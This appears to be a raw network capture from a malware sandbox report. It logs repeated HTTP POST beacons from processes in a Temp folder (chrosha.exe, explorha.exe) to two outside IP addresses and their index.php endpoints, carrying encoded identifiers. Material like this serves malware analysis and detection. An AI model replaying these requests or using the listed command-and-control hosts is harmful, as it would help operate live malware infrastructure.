                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1078 | 192.168.2.5 | 50933 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:56.153461933 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:56.400955915 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1079 | 192.168.2.5 | 50932 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:56.153932095 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:56.409738064 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1080 | 192.168.2.5 | 50934 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:56.648047924 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:56.897547960 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1081 | 192.168.2.5 | 50935 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:56.773607969 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:57.020893097 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1082 | 192.168.2.5 | 50936 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:57.257344007 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:57.501995087 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1083 | 192.168.2.5 | 50937 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:57.277571917 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:57.539215088 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1084 | 192.168.2.5 | 50938 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:57.753730059 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:58.001609087 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1085 | 192.168.2.5 | 50939 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:57.898870945 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:58.144459009 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1086 | 192.168.2.5 | 50940 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:58.364722967 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:58.607431889 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1087 | 192.168.2.5 | 50941 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:58.397710085 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:58.649490118 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1088 | 192.168.2.5 | 50942 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:58.859797955 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:59.114305973 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1089 | 192.168.2.5 | 50943 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:59.013840914 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:59.265852928 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1090 | 192.168.2.5 | 50944 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:59.485761881 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:59.738560915 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1091 | 192.168.2.5 | 50945 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:59.523258924 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:59.774462938 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1092 | 192.168.2.5 | 50946 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:59.996264935 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:00.246011019 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1093 | 192.168.2.5 | 50947 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:00.134497881 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:00.379399061 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1094 | 192.168.2.5 | 50948 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:00.602394104 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:00.848083019 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1095 | 192.168.2.5 | 50949 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:00.636420965 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:00.888441086 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1096 | 192.168.2.5 | 50950 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:01.016609907 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
